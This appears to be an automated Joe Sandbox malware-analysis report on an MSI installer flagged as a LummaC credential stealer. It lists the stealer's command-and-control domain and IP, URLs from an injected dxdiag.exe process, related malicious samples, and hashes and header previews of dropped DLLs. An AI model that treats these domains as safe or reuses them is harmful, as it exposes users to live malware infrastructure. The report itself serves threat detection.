C:\Windows\Installer\MSIAEB.tmp	100%	Joe Sandbox ML
C:\Windows\Installer\MSI602.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI670.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI6FE.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI79B.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI839.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI982.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIAEB.tmp	63%	ReversingLabs	Win32.Exploit.LummaC

Source	Detection	Scanner	Label
https://fixxyplanterv.click/d	0%	Avira URL Cloud	safe
https://fixxyplanterv.click/ce	0%	Avira URL Cloud	safe
https://fixxyplanterv.click/apiQ	0%	Avira URL Cloud	safe
https://fixxyplanterv.click/alS5	0%	Avira URL Cloud	safe
https://fixxyplanterv.click/ob:6_	0%	Avira URL Cloud	safe
https://fixxyplanterv.click/api	0%	Avira URL Cloud	safe
fixxyplanterv.click	0%	Avira URL Cloud	safe
https://fixxyplanterv.click/	0%	Avira URL Cloud	safe
https://fixxyplanterv.click/pi	0%	Avira URL Cloud	safe
https://fixxyplanterv.click/apiuu	0%	Avira URL Cloud	safe
https://fixxyplanterv.click/%a	0%	Avira URL Cloud	safe
https://fixxyplanterv.click/apib	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
fixxyplanterv.click	172.67.134.197	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
dare-curbys.biz	false		high
impend-differ.biz	false		high
covery-mover.biz	false		high
https://fixxyplanterv.click/api	true	Avira URL Cloud: safe	unknown
dwell-exclaim.biz	false		high
zinc-sneark.biz	false		high
fixxyplanterv.click	true	Avira URL Cloud: safe	unknown
formy-spill.biz	false		high
se-blurry.biz	false		high
print-vexer.biz	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	dxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	dxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	dxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	dxdiag.exe, 00000006.00000003.2242542138.00000000029AD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://fixxyplanterv.click/d	dxdiag.exe, 00000006.00000003.2217619969.0000000002985000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	dxdiag.exe, 00000006.00000003.2242542138.00000000029AD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://fixxyplanterv.click/	dxdiag.exe, 00000006.00000003.2295091378.0000000002995000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	dxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	dxdiag.exe, 00000006.00000003.2241150379.0000000004A54000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	dxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	dxdiag.exe, 00000006.00000003.2241150379.0000000004A54000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fixxyplanterv.click/alS5	dxdiag.exe, 00000006.00000003.2268687272.0000000002990000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	dxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	dxdiag.exe, 00000006.00000003.2242542138.00000000029AD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	dxdiag.exe, 00000006.00000003.2242276188.0000000004B52000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_	dxdiag.exe, 00000006.00000003.2242542138.00000000029AD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://fixxyplanterv.click/pi	dxdiag.exe, 00000006.00000002.2308418613.0000000002995000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2304057412.0000000002995000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	dxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fixxyplanterv.click/apiuu	dxdiag.exe, 00000006.00000002.2307824056.0000000002916000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2303635403.0000000002916000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fixxyplanterv.click/ce	dxdiag.exe, 00000006.00000003.2268687272.0000000002990000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	dxdiag.exe, 00000006.00000003.2242542138.00000000029AD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://fixxyplanterv.click/ob:6_	dxdiag.exe, 00000006.00000003.2274208940.0000000002995000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2258750277.0000000002988000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000002.2308418613.0000000002995000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2304057412.0000000002995000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2280230391.0000000002988000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2279871689.000000000298F000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2268687272.0000000002990000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2295091378.0000000002995000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	dxdiag.exe, 00000006.00000003.2241150379.0000000004A54000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	dxdiag.exe, 00000006.00000003.2241150379.0000000004A54000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	dxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fixxyplanterv.click/apiQ	dxdiag.exe, 00000006.00000002.2307824056.0000000002916000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2303635403.0000000002916000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3	dxdiag.exe, 00000006.00000003.2242542138.00000000029AD000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	dxdiag.exe, 00000006.00000003.2241150379.0000000004A54000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fixxyplanterv.click/apib	dxdiag.exe, 00000006.00000002.2307824056.0000000002916000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2303635403.0000000002916000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	dxdiag.exe, 00000006.00000003.2242276188.0000000004B52000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fixxyplanterv.click/%a	dxdiag.exe, 00000006.00000003.2258774051.0000000002982000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	dxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.mozilla.or	dxdiag.exe, 00000006.00000003.2242227992.0000000004A50000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta	dxdiag.exe, 00000006.00000003.2242542138.00000000029AD000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.134.197	fixxyplanterv.click	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589838
Start date and time:	2025-01-13 08:28:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	msit.msi
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winMSI@10/25@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .msi

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.253.45, 4.245.163.56
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target MSIAEB.tmp, PID 2248 because there are no executed function
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:29:11	API Interceptor	8x Sleep call for process: dxdiag.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fixxyplanterv.click	schost.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.6.116

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Shipping Docs Waybill No 2009 xxxx 351.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	trow.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://encryption-deme-group.lomiraxen.ru/PdoodjcL/#Mvercauteren.william@deme-group.com	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://link.mail.beehiiv.com/ss/c/u001.dSnm3kaGd0BkNqLYPjeMfxWXllAYaBQ5sAn4OVD0j89GQGPZtwQlLugE_8c0wQMKfkpy5_wJ66BvE1Ognfzf5MlQMAeZ1qYs5mgwUBu3TAc6279Q43ISHz-HkVRC08yeDA4QvKWsqLTI1us9a0eXx18qeAibsZhjMMPvES-iG2zoVABKcwKIVWyx95VTVcFMSh6AEN3OCUfP_rXFvjKRbIPMuhn_dqYr8yUBKJvhhlJR9FhTpZPAULxzMbsYWp8k/4cu/JfECY1HwRl-ipvrNOktVcw/h23/h001.ibQl2N4tDD79TTzErix_sFWEGLTTuM6dTVMrTg3y5Dk	Get hash	malicious	Unknown	Browse	172.67.40.50
	g3.elf	Get hash	malicious	Unknown	Browse	1.1.1.1
	g5.elf	Get hash	malicious	Unknown	Browse	1.1.1.1
	rCHARTERREQUEST.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	https://app-nadexlxogi.webflow.io/	Get hash	malicious	Unknown	Browse	172.64.151.8
	https://postaboutx.com/	Get hash	malicious	Unknown	Browse	172.67.134.64
	https://informed.deliveryerz.top/us/	Get hash	malicious	Unknown	Browse	104.16.40.28

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	PCB - Lyell Highway Upgrades Queenstown to Strahan - March 2021.XLSM	Get hash	malicious	Unknown	Browse	172.67.134.197
	PCB - Lyell Highway Upgrades Queenstown to Strahan - March 2021.XLSM	Get hash	malicious	Unknown	Browse	172.67.134.197
	L7GNkeVm5e.exe	Get hash	malicious	LummaC	Browse	172.67.134.197
	sE5IdDeTp2.exe	Get hash	malicious	Unknown	Browse	172.67.134.197
	NDWffRLk7z.exe	Get hash	malicious	LummaC	Browse	172.67.134.197
	g3toRYa6JE.exe	Get hash	malicious	LummaC	Browse	172.67.134.197
	lBb4XI4eGD.exe	Get hash	malicious	LummaC	Browse	172.67.134.197
	UWYXurYZ2x.exe	Get hash	malicious	LummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty Stealer	Browse	172.67.134.197
	sE5IdDeTp2.exe	Get hash	malicious	Unknown	Browse	172.67.134.197
	TBI87y49f9.exe	Get hash	malicious	LummaC	Browse	172.67.134.197

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Windows\Installer\MSI602.tmp	Fact30.NATURGY.LUNESGRLNOPAGOID3012021414252024.MSI.msi	Get hash	malicious	Unknown	Browse
	Fact28.NATURGY.SABADONOPAGOID28122024.MSI.msi	Get hash	malicious	Unknown	Browse
	bmouJCkvam.msi	Get hash	malicious	Unknown	Browse
	FS-SZHAJCVS.msi	Get hash	malicious	Unknown	Browse
	FS-JFDIBGWE.msi	Get hash	malicious	Unknown	Browse
	http://propdfhub.com	Get hash	malicious	Unknown	Browse
	http://res.pdfonestartlive.com	Get hash	malicious	Unknown	Browse
	740d3a.msi	Get hash	malicious	Unknown	Browse
	740d3a.msi	Get hash	malicious	PureCrypter	Browse
	j45EY4ovxx.msi	Get hash	malicious	Matanbuchus	Browse

Created / dropped Files

C:\Config.Msi\5403f1.rbs

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	modified
Size (bytes):	863
Entropy (8bit):	5.5270055721306175
Encrypted:	false
SSDEEP:	24:r/BMV8TvbPQjp6eSGV8Tv6V8Tv2pUn4oOYDhiSs6ao7id:7i6oke5h447YD8Ss6asW
MD5:	B6A596CC7D1F941FC4416D7E9540519C
SHA1:	BA2BE5D5E48DA96F793F2E3D3312163CAC109374
SHA-256:	CDC892359E93C912ABC6196914DC8ED964763433DEBD72542C9E35DA0A59965E
SHA-512:	C5D7EAFE353F5D5B3D45928A2D67F95A3A2B884232C73DF6C69C6CAAB22C791D2E8B9DF3E78B3E8891C1F9729AD287EBC9E108889771FD33A4C5B7E73EE45A6A
Malicious:	false
Reputation:	low
Preview:	...@IXOS.@.....@..-Z.@.....@.....@.....@.....@.....@......&.{15630F35-AF86-45E7-B3CF-07A0AC07CAF6}..msit..msit.msi.@.....@.....@.....@........&.{BA748999-88DC-472F-9632-A6EFC559C1F2}.....@.....@.....@.....@.......@.....@.....@.......@......msit......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{86FA086C-1DD0-4082-AC92-FB7682CD7E34}&.{15630F35-AF86-45E7-B3CF-07A0AC07CAF6}.@......&.{78C5261A-F04A-4AA9-A391-7F6716DBC52E}&.{15630F35-AF86-45E7-B3CF-07A0AC07CAF6}.@........CreateFolders..Creating folders..Folder: [1]#.!.C:\Program Files (x86)\msit\msit\.@........WriteRegistryValues..Writing system registry values..Key: [1], Name: [2], Value: [3]$..@......Software\msit\msit...@....(.&...Version..1.0.0'.&...Path!.C:\Program Files (x86)\msit\msit\...@.....@.....@....

C:\Windows\Installer\5403ef.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {BA748999-88DC-472F-9632-A6EFC559C1F2}, Number of Words: 2, Subject: msit, Author: msit, Name of Creating Application: msit, Template: ;1033, Comments: This installer database contains the logic and data required to install msit., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Fri Dec 13 03:26:19 2024, Last Saved Time/Date: Fri Dec 13 03:26:19 2024, Last Printed: Fri Dec 13 03:26:19 2024, Number of Pages: 450
Category:	dropped
Size (bytes):	16847872
Entropy (8bit):	7.611938145565435
Encrypted:	false
SSDEEP:	393216:LPF3zv8Zrqb+CUuubX26jytnTPjnXcBv9k2VvOTp:JzwqNUHytvnMd9Z
MD5:	18577F68754F3E2703CDCA2DF9BA65FF
SHA1:	8D8846470510B1B6F81C0725975C7C3589568BB3
SHA-256:	413C17F73A0831D6AE209E491856A66E07E8C0AF70E7E06F68A7B7570CCB3A95
SHA-512:	EB238A258B0DFE40716C2A8BC847951ABBAC4E7224ECEFCB13BE559A63CC39E6645E406764991CB60B87AA082196B890FF78C3C25C659B851EB02C4064E8EAEC
Malicious:	false
Reputation:	low
Preview:	......................>...........................................1...........H.......p.......i............................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)......+...,...-......./...............<...........!...4............................................................................................... ...+..."...#...$...%...&...'...(...)......1...,...-......./...0...5...2...3...=...?...6...7...8...9...:...;...F.......>...G...@...A...B...C...D...E...................J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Windows\Installer\MSI602.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1021792
Entropy (8bit):	6.608380087035959
Encrypted:	false
SSDEEP:	24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
MD5:	EC6EBF65FE4F361A73E473F46730E05C
SHA1:	01F946DFBF773F977AF5ADE7C27FFFC7FE311149
SHA-256:	D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
SHA-512:	E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Fact30.NATURGY.LUNESGRLNOPAGOID3012021414252024.MSI.msi, Detection: malicious, Browse Filename: Fact28.NATURGY.SABADONOPAGOID28122024.MSI.msi, Detection: malicious, Browse Filename: bmouJCkvam.msi, Detection: malicious, Browse Filename: FS-SZHAJCVS.msi, Detection: malicious, Browse Filename: FS-JFDIBGWE.msi, Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: 740d3a.msi, Detection: malicious, Browse Filename: 740d3a.msi, Detection: malicious, Browse Filename: j45EY4ovxx.msi, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................

C:\Windows\Installer\MSI670.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1021792
Entropy (8bit):	6.608380087035959
Encrypted:	false
SSDEEP:	24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
MD5:	EC6EBF65FE4F361A73E473F46730E05C
SHA1:	01F946DFBF773F977AF5ADE7C27FFFC7FE311149
SHA-256:	D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
SHA-512:	E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................

C:\Windows\Installer\MSI6FE.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1021792
Entropy (8bit):	6.608380087035959
Encrypted:	false
SSDEEP:	24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
MD5:	EC6EBF65FE4F361A73E473F46730E05C
SHA1:	01F946DFBF773F977AF5ADE7C27FFFC7FE311149
SHA-256:	D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
SHA-512:	E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................

C:\Windows\Installer\MSI79B.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1021792
Entropy (8bit):	6.608380087035959
Encrypted:	false
SSDEEP:	24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
MD5:	EC6EBF65FE4F361A73E473F46730E05C
SHA1:	01F946DFBF773F977AF5ADE7C27FFFC7FE311149
SHA-256:	D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
SHA-512:	E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................

C:\Windows\Installer\MSI839.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1201504
Entropy (8bit):	6.4558508565404535
Encrypted:	false
SSDEEP:	24576:h4FsQxRqkY1ngOktwC2Tec+4VGWSlnH/YrjPWqTIUGFUrHtAkJMsFUh29BKjxm:a2QxNwCsec+4VGWSlnfYvOjUGFUrHtA2
MD5:	03CC8828BB0E0105915B7695B1EC8D88
SHA1:	CBF8EC531EA7E3EE58B51BD642F8BFABDC759EE1
SHA-256:	0E1491AE7344F3A5EC824732648CCDDA19B271D6F01471793BF292840FC83B5E
SHA-512:	593A76166EB6CE2E3537B0D93E216DAEF12E4AB5B181A194B55A90B39A1AF2E0374C4EC3833A000530425319A003CD1A648489640FCCAF108061EBEA1D9CB1E7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............@G..@G..@G.yCF..@G.yEF..@G.\|CF..@G.\|DF..@G.\|EF..@G.yDF..@G.yAF..@G..AG..@G.}IF..@G.}@F..@G.}.G..@G...G..@G.}BF..@GRich..@G........PE..L...v..f.........."!...).~..........Pq.......................................`............@A........................ ...t...............................`=.......l......p........................... ...@...............L............................text...J}.......~.................. ..`.rdata...;.......<..................@..@.data...............................@....fptable............................@....rsrc...............................@..@.reloc...l.......n..................@..B........................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI982.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1021792
Entropy (8bit):	6.608380087035959
Encrypted:	false
SSDEEP:	24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
MD5:	EC6EBF65FE4F361A73E473F46730E05C
SHA1:	01F946DFBF773F977AF5ADE7C27FFFC7FE311149
SHA-256:	D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
SHA-512:	E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................

C:\Windows\Installer\MSIACB.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	942
Entropy (8bit):	5.3743474005382765
Encrypted:	false
SSDEEP:	24:r6BMV8TvbPQjnu65SYRouKLjWZpURoOYDhiSKzao7i0l:Wi6oVBiLjeS7YD8SKzasX
MD5:	95F0D09B8E996DF6C1D095A2E6872F67
SHA1:	C12CB94FADD56FECB351647D0EC88A56471EB5C7
SHA-256:	169C4A86C9916069F6D104890A14F80D6D48155D5183BEC64943EAB3D96EBAB4
SHA-512:	1E62FA06515786B94573D1A9F8F56EE82EAF79BB4E454CA6D38E1CB0F281831434CB17CCE680D8DE0FBE6A3D253DCAC69B53EF813EC6FF78BD761EAEE1687F24
Malicious:	false
